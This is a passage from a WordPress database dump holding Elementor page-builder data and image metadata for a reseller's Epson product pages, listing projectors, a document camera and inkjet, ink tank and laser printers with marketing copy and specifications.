]<\\/center><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1914d98\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"b5f42fd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"e3f8c24\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"d81ddc4\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4f4cdf2\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"890a1d6\",\"elType\":\"widget\",\"settings\":{\"title\":\"INTERACTIVE\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c314a77\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"fbcb210\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"1897c27\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson EB-536Wi\\u00a0<\\/strong><\\/h4><p><img class=\\\"wp-image-2439 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-536Wi.png\\\" alt=\\\"\\\" width=\\\"242\\\" height=\\\"136\\\" \\/><\\/p><p>Project large screen sizes even at close range and make your presentations larger-than-life with Epson EB-536Wi projector.<\\/p><ul><li>White and Colour Brightness at 3,400lm<\\/li><li>WXGA Resolution<\\/li><li>Multi-PC projection<\\/li><li>HDMI Connectivity<\\/li><li>Pen Interactivity<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"1dcee02\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\",\"_margin\":{\"unit\":\"px\",\"top\":\"-10\",\"right\":\"-10\",\"bottom\":\"-10\",\"left\":\"-10\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a597712\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d315157\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson 595Wi\\/585Wi\\/575Wi<\\/strong>\\u00a0<img class=\\\"alignnone wp-image-2440\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-595Wi.png\\\" alt=\\\"\\\" width=\\\"276\\\" height=\\\"155\\\" \\/><\\/h4>\\nWith the finger-touch interactive function and PC-free annotation, you can easily transform any surface into an interactive environment so everyone can throw their ideas on the table.\\n<ul>\\n \\t<li>WXGA Resolution<\\/li>\\n \\t<li>White and Colour Brightness at 3,300lm<\\/li>\\n \\t<li>Multi-PC projection<\\/li>\\n \\t<li>HDMI Connectivity x2<\\/li>\\n<\\/ul>\\n<div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"de8ca10\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"61ea7aa\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e5676d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"281e34f\",\"elType\":\"widget\",\"settings\":{\"title\":\"HIGH BRIGHTNESS\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7a49451\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"f301a8e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e7e2436\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson EB-L1405UNL\\u00a0<\\/strong><\\/p><p><img class=\\\"alignnone wp-image-2441\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/EB-L1405UNL.png\\\" alt=\\\"\\\" width=\\\"207\\\" height=\\\"117\\\" \\/><\\/p><p>The Epson EB-L1405U projector is designed to deliver unyielding laser performance, from any position to most surfaces, up to 20,000\\u00a0long lasting hours maintenance-free.<\\/p><ul><li>White and Colour Brightness at 8,000lm<\\/li><li>WUXGA (1920 x 1200)<\\/li><li>Edge-blending to create large panoramic images<\\/li><li>Curve and corner wall projection<\\/li><li>HDBaseT<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"dd3bc89\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6d9f7b4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson EB-G7400UNL\\u00a0<\\/strong><\\/p><p><img class=\\\"alignnone wp-image-2442\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-G7400UNL.png\\\" alt=\\\"\\\" width=\\\"205\\\" height=\\\"116\\\" \\/><\\/p><p>Epson high brightness EB-G7400U projector presents a new perspective on clarity, durability, and versatility. With the advanced C2Fine\\u2122 and 4K Enhancement Technology, projections are brought to life with vibrant colours in extreme resolution and vividness. Overcome the limitations of space constraints and project large and uncompromised images through the projector\\u2019s astoundingly short throw ratio of 0.35*.<\\/p><p><em>* With optional ELPLX01 zero offset ultra-short throw lens.<\\/em><\\/p><ul><li>High Brightness<\\/li><li>Beyond Full HD Resolution<\\/li><li>Powered Lens<\\/li><li>Portrait Projection<\\/li><li>Flexible Installation<\\/li><li>Edge Blending<\\/li><li>Point Correction<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2860f60\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"abe0604\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson EB-Z10000U\\u00a0<\\/strong><\\/p><p><img class=\\\"alignnone wp-image-2443\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-Z10000U.png\\\" alt=\\\"\\\" width=\\\"208\\\" height=\\\"117\\\" \\/><\\/p><p>Discover a powerful way to impress your audience the EB-Z10000U high brightness business projector gives you stunning, high-definition images with its 3LCD technology.<\\/p><ul><li>White and Colour Brightness at 10,000\\u00a0lm<\\/li><li>WUXGA resolution<\\/li><li>High Reliability and Durability<\\/li><li>Suitable for 24\\/7 usage<\\/li><li>Flexible projection angles and installations<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6e2f23c\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"1be2016\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ccccf17\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>DOCUMENT CAMERAS<\\/h3><p><strong>Document Camera ELPDC21\\u00a0<\\/strong><img src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Document-Camera-ELPDC21.jpg\\\" alt=\\\"\\\" width=\\\"206\\\" height=\\\"137\\\" \\/><\\/p><p>Cut through the hassle, and get straight to your presentation. Epsons series of document cameras not only captures details with Full HD resolution, its versatile connectivity also gives you great functionality.<\\/p><ul><li>Pixels: 2MP (1920 x 1080 pixels)<\\/li><li>Camera Sensor: 1\\/2.7 inch CMOS Sensor<\\/li><li>Resolution: Up to Full HD (1080p)<\\/li><li>Zoom: 10x Digital Zoom, 12x Optical Zoom<\\/li><li>Weight: Approx 3.0kg<\\/li><\\/ul><p>[maxbutton id=\\\"12\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"d5e60a0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"b6a1050\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(8061,3495,'_elementor_version','2.5.14'),(8663,3664,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:3509;s:6:\"height\";i:2481;s:4:\"file\";s:20:\"2019/10/Dell-PNG.png\";s:5:\"sizes\";a:7:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"Dell-PNG-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"Dell-PNG-300x212.png\";s:5:\"width\";i:300;s:6:\"height\";i:212;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:20:\"Dell-PNG-768x543.png\";s:5:\"width\";i:768;s:6:\"height\";i:543;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:21:\"Dell-PNG-1024x724.png\";s:5:\"width\";i:1024;s:6:\"height\";i:724;s:9:\"mime-type\";s:9:\"image/png\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:20:\"Dell-PNG-300x150.png\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:20:\"Dell-PNG-480x300.png\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:15:\"onepress-medium\";a:4:{s:4:\"file\";s:20:\"Dell-PNG-640x400.png\";s:5:\"width\";i:640;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(8064,3496,'_wp_page_template','template-fullwidth.php'),(8065,3496,'_elementor_edit_mode','builder'),(8066,3496,'_elementor_template_type','post'),(8067,3496,'_elementor_data','[{\"id\":\"0bcf275\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"829ac8b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"2449815\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>As a global technology leader, Epson creates and delivers technology solutions for businesses and consumers, from inkjet printers and digital printing systems to 3LCD projectors, smart glasses, sensing systems and industrial robots. The company is focused on driving innovations and exceeding customer expectations in inkjet, visual communications, wearables and robotics.<\\/p><h2>Printers for Work<\\/h2><p>Epson has the best printers for your business requirements regardless documents, photos, receipts, large-formats, labels, or even apparels.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2698f52\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"93fa1d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"f872ca9\",\"elType\":\"widget\",\"settings\":{\"title\":\"BUSINESS INKJET PRINTER\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2a74bb0\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"245ffff\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"12a92f5\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson WorkForce Enterprise WF-C17590\\u00a0<\\/strong><\\/h4><p><img class=\\\"alignnone wp-image-2417\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-Enterprise-WF-C17590.jpg\\\" alt=\\\"\\\" width=\\\"366\\\" height=\\\"207\\\" \\/><\\/p><p>Our massive investment in revolutionary technologies enables us to pay attention to every minute detail. PrecisionCore\\u2122, our next generation, high-density printhead, takes a great leap forward in enterprise printing. Epson WorkForce Enterprise WF-C17590 has arrived, giving you exactly what you need: superior quality, excellent connectivity and prints at lightning fast speed.<\\/p><ul><li>4-in-1 Network MFP: Print | Copy | Scan | Fax<\\/li><li>Ink: DURABrite<sup>TM<\\/sup>\\u00a0Pro pigment ink cartridges<\\/li><li>ISO Print Speed: 75 ISO ppm (black\\/colour) simplex\\/duplex<\\/li><\\/ul>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"d99a531\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":18,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"51d6ae3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><span style=\\\"text-align: left; color: #7a7a7a; font-family: Roboto, sans-serif; font-weight: 400; font-size: 0.875rem;\\\">[maxbutton id=\\\"12\\\" ]<\\/span><\\/h4>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"3a12efc\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f7ffeb9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson WorkForce Pro WF-C5290\\u00a0<\\/strong><\\/h4><p><img class=\\\"alignnone wp-image-2418\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-Pro-WF-C5290.png\\\" alt=\\\"\\\" width=\\\"378\\\" height=\\\"213\\\" \\/><\\/p><p>Enjoy low-cost, reliable printing with Epson WorkForce Pro WF-C5290 business printer. Delivering fast print speeds of up to 24ipm with a first page-out time of just 4.8 seconds, it is built to handle the most demanding print jobs. With a range of printing and connectivity features, this printer is the ideal solution for small workgroups that require hassle-free, low-maintenance and productive-boosting printing.<\\/p><ul><li>High yield ink packs<\\/li><li>High-speed auto-duplex printing<\\/li><li>USB, Ethernet, Wi-Fi, Wi-Fi Direct and NFC<\\/li><li>Epson Connect<\\/li><li>Energy\\u00a0saving<\\/li><\\/ul>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"c9f78e3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><span style=\\\"text-align: left; color: #7a7a7a; font-family: Roboto, sans-serif; font-weight: 400; font-size: 0.875rem;\\\">[maxbutton id=\\\"12\\\" ]<\\/span><\\/h4>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"94b61d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b740aaa\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson WorkForce WF-100\\u00a0<\\/strong><\\/h4><p><img class=\\\"alignnone wp-image-2419\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-WF-100.png\\\" alt=\\\"\\\" width=\\\"378\\\" height=\\\"213\\\" \\/><\\/p><p>Introducing the Epson WorkForce WF-100, a lightweight portable inkjet printer designed for professionals on the go. Battery-operated with integrated wireless capabilities such as Wi-Fi Direct and Epson Connect, you can have quality colour printouts anytime, anywhere.<\\/p><ul><li>Print speed up to 14 ppm<\\/li><li>Epson Connect<\\/li><li>1.44 Colour LCD Panel<\\/li><li>Wi-Fi and Wi-Fi Direct connectivity<\\/li><li>Built-in battery<\\/li><\\/ul>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"96730a6\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":49,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"addc0f3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><span style=\\\"text-align: left; color: #7a7a7a; font-family: Roboto, sans-serif; font-weight: 400; font-size: 0.875rem;\\\">[maxbutton id=\\\"12\\\" ]<\\/span><\\/h4>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2b0e3f9\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"e754d94\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"fc3866b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson WorkForce WF-7711<\\/strong><\\/h4>\\n<img class=\\\"wp-image-2420 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-WF-7711.png\\\" alt=\\\"\\\" width=\\\"304\\\" height=\\\"172\\\" \\/><br>\\n\\nChange the way you print A3+ business documents with the Epson WorkForce WF-7711 printer. Designed for convenience, this smart printer is equipped with a suite of connectivity features, from USB and Ethernet to Wi-Fi Direct and NFC. With PrecisionCore<sup>TM<\\/sup>\\u00a0technology, fast printing speed consistently delivers success in every detail.\\n<ul>\\n \\t<li>Print speeds up to 18ipm for black and 10ipm for colour<\\/li>\\n \\t<li>USB, Ethernet, Wi-Fi, Wi-Fi Direct and NFC<\\/li>\\n \\t<li>Duplex printing up to A3 size<\\/li>\\n \\t<li>Epson DURABrite<sup>TM<\\/sup>\\u00a0Ultra ink<\\/li>\\n \\t<li>4.3\\u201d Colour LCD Touch Panel<\\/li>\\n \\t<li>Print, Scan, Copy Fax with ADF<\\/li>\\n<\\/ul>\\n<div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"5178d20\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"b031280\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"b3a013d\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"f2b7b04\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"c71ec36\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"732a1a6\",\"elType\":\"widget\",\"settings\":{\"title\":\"INK TANK SYSTEM\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e709cb3\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"60cd262\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"97d2102\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson EcoTank L3150<\\/strong><\\/h4><p><img class=\\\"wp-image-2421 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EcoTank-L3150-.jpg\\\" alt=\\\"\\\" width=\\\"311\\\" height=\\\"175\\\" \\/><\\/p><p>Save more with Epson\\u2019s economical and multifunctional printing solutions for business\\u2014the EcoTank L3150\\u2014built to bring down costs, and bring up productivity. The integrated ink tank enables spill-free, error-free refilling with individual bottles that have designated nozzles. Other features include borderless 4R printing and an ultra-high yield of 7,500 coloured and 4,500 black-and-white pages. The EcoTank L3150 also delivers the convenience of wireless connectivity, allowing direct printing from smart devices.<\\/p><ul><li>Compact integrated tank design<\\/li><li>High yield ink bottles<\\/li><li>Spill-free, error-free refilling<\\/li><li>Wi-Fi, Wi-Fi Direct<\\/li><li>Epson Connect (Epson iPrint, Epson Email Print and Remote Print Driver)<\\/li><li>Borderless printing up to 4R<\\/li><\\/ul><div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"63366b2\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8449cce\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson L120 Printer\\u00a0<\\/strong><br \\/><br \\/><img class=\\\"alignnone wp-image-2422\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-L120-Printer.png\\\" alt=\\\"\\\" width=\\\"301\\\" height=\\\"170\\\" \\/><\\/h4><p>The Epson L120 ink tank system printer brings speedy performance with low running costs to all your personal and work projects.<\\/p><ul><li>High-yield ink bottles<\\/li><li>Print speed up to 8.5ipm for black-and-white and 4.5ipm for color<\\/li><li>Compact Size<\\/li><li>Warranty of 2 Years or 20,000 Pages, whichever comes first<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"9109035\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":164,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"140f583\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div style=\\\"text-align: center;\\\">[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"7d56d33\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a539e2b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson M1100 Printer<\\/strong><\\/h4><p><img class=\\\"wp-image-2423 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-M1100-Printer-.png\\\" alt=\\\"\\\" width=\\\"315\\\" height=\\\"178\\\" \\/><\\/p><p>Efficiency\\u00a0meets economy with the EcoTank monochrome M1100 printer. Look forward to lower business costs with bottles that provide an ultra-high page yield of up to 6,000 pages\\u00a0each. Simplify processes with the integrated ink tank that enables spill - and error-free ink refilling, and enjoy laser-quality text that is smudge-proof and water-resistant with the pigment ink.<\\/p><ul><li>Compact integrated tank design<\\/li><li>High-yield pigment ink bottle<\\/li><li>Spill-free, error-free refilling<\\/li><li>Print speed up to 32ppm (15ipm)<\\/li><li>4 years warranty<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"e74569a\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":60,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"e157d4e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2ffcc87\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c140b6d\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0c8225a\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"b3a6fcb\",\"elType\":\"widget\",\"settings\":{\"title\":\"LASER PRINTER\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a7c8449\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"650cf58\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"82105a8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson AcuLaser C9300N<\\/strong><\\/h4><br><br>\\n<img class=\\\"wp-image-2424 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-AcuLaser-C9300N.png\\\" alt=\\\"\\\" width=\\\"313\\\" height=\\\"177\\\" \\/><br>\\n\\nThe Epson AcuLaser\\u2122 C9300N breaks new ground with its class-leading 1200dpi standard resolution for A3 colour laser printing. Together with its fast speed and high reliability, it packs superior performance in a cost efficient design that perfectly complements the needs of demanding workgroups.\\n<ul>\\n \\t<li>1200 x 1200 dpi<\\/li>\\n \\t<li>Speed: Up to 30ppm<\\/li>\\n \\t<li>First page out in 8.3 sec or less (mono A4), 9.9 sec (colour A4)<\\/li>\\n \\t<li>Quality prints with new Epson Technologies<\\/li>\\n \\t<li>New print job management features<\\/li>\\n<\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"ee8d71a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div style=\\\"text-align: center;\\\">[maxbutton id=\\\"12\\\" ]<\\/div>\",\"_margin\":{\"unit\":\"px\",\"top\":\"18\",\"right\":\"18\",\"bottom\":\"18\",\"left\":\"18\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"8295a6c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"22e2324\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\">\\u00a0<strong>Epson WorkForce AL-M320DN\\u00a0<\\/strong><\\/h4><br><br>\\n<img class=\\\"wp-image-2426 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-AL-M320DN-.jpg\\\" alt=\\\"\\\" width=\\\"254\\\" height=\\\"296\\\" \\/><br>\\n\\nThe Workforce AL-M320DN delivers absolute performance and reliability despite their compact size. Equipped with network printing capabilities and blazing fast performance to support ultra-high volume printing, these printers are built for the most demanding office environments. Further boost productivity with the free fleet management software, Epson Device Admin, to organise and monitor printers remotely.\\n<ul>\\n \\t<li>1200 x 1200 dpi<\\/li>\\n \\t<li>Print speed up to 35ppm<\\/li>\\n \\t<li>Auto-Duplex<\\/li>\\n \\t<li>Ethernet &amp; Epson iPrint<\\/li>\\n \\t<li>2 optional paper cassette tray<\\/li>\\n<\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"e06a550\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div style=\\\"text-align: center;\\\">[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"49ae59d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6612146\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4><strong>Epson WorkForce AL-M8100DN\\u00a0<\\/strong><\\/h4><br><br>\\n<img class=\\\"wp-image-2427 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-AL-M8100DN-.png\\\" alt=\\\"\\\" width=\\\"256\\\" height=\\\"144\\\" \\/><br><br>\\n\\nUnleash remarkable efficiency to your workflow. Powered by a 600Mhz dual core processor, the WorkForce AL-8100DN delivers quality A3 and A4 prints with swift speeds of up to 40ppm and is packed with 1GB RAM for faster processing of multiple print jobs.\\n<ul>\\n \\t<li>1200 x 1200 dpi<\\/li>\\n \\t<li>Print speed up to 40 ppm<\\/li>\\n \\t<li>Epson iPrint<\\/li>\\n \\t<li>Ethernet<\\/li>\\n \\t<li>4 optional cassette trays<\\/li>\\n<\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"3432510\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div style=\\\"text-align: center;\\\">[maxbutton id=\\\"12\\\" ]<\\/div>\",\"_margin\":{\"unit\":\"px\",\"top\":\"75\",\"right\":\"75\",\"bottom\":\"75\",\"left\":\"75\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d3590c0\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"7139e3e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"77f919a\",\"elType\":\"widget\",\"settings\":{\"title\":\"POS 